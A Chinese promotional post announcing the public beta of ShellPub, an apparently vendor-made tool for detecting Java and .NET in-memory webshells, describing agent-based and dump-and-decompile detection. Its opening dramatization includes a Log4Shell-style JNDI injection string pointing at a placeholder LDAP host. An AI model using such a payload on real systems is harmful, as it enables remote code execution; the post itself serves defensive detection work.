就让你抢个先手，但也暴露了你的招式

一年了，你的内存马攻击可有新的变化？

${jndi:ldap://xxxx.com.cn}

也接我一招，专破内存马！

“重启吧。”你关掉ssh终端，对旁边的甲方小哥说。

“你刚刚用的是ShellPub吗？”

你转过头去，认真地说：“ShellPub，是的，但我更喜欢叫它——河马！”

ShellPub，河马内存马检测工具正式公测：

► Linux版，专用于Java类内存马检测

• 自动识别包括Tomcat、Weblogic、Jboss 环境；

• Spring等打包环境支持手动指定进程方式，因此第三方Java应用（gitlab，ES）都可以检测；

► Windows版

• Java内存马检测, Java6+; OA系统、办公系统；
• Net内存马，IIS等场景下的.net内存马检测。

全面覆盖内存马常见场景，可检测冰蝎、哥斯拉等内存马利用工具注入的内存马。

河马是如何检测内存马的？

但关于在哪儿检测恶意代码，目前有两种方式：

► 在内存中检测

这种方法是将检测的agent注入内存中，Hook关键的类，无论内存马是动态注册，还是基于agent修改字节码，都可以预先被检测agent感知到，然后运行检测代码。

► 在内存中找，在硬盘上检测

同样是使用agent技术，进入目标JVM中，遍历筛选可疑的类，然后dump到硬盘，将类字节码反编译为Java代码后，再进行恶意代码检测。

相比前一种检测方法，这种方法相对比较温和，对正常业务的侵入性较弱。

ShellPub河马当前既支持Agent方式检测，也支持无Agent方式检测。

如何获取内存马检测工具：

1. 关注SHELLPUB公众号

2. 在后台回复【winmem】获取Windows内存马检测工具

3. 在后台回复【linuxmem】获取Linux内存马检测工具

获取工具后会得到我们的交流群密码，群里有开发小哥哥为你处理BUG，也有专门的分析师帮你分析内存马样本！

点击下方名片，关注我们

如果不想错过消息，可以星标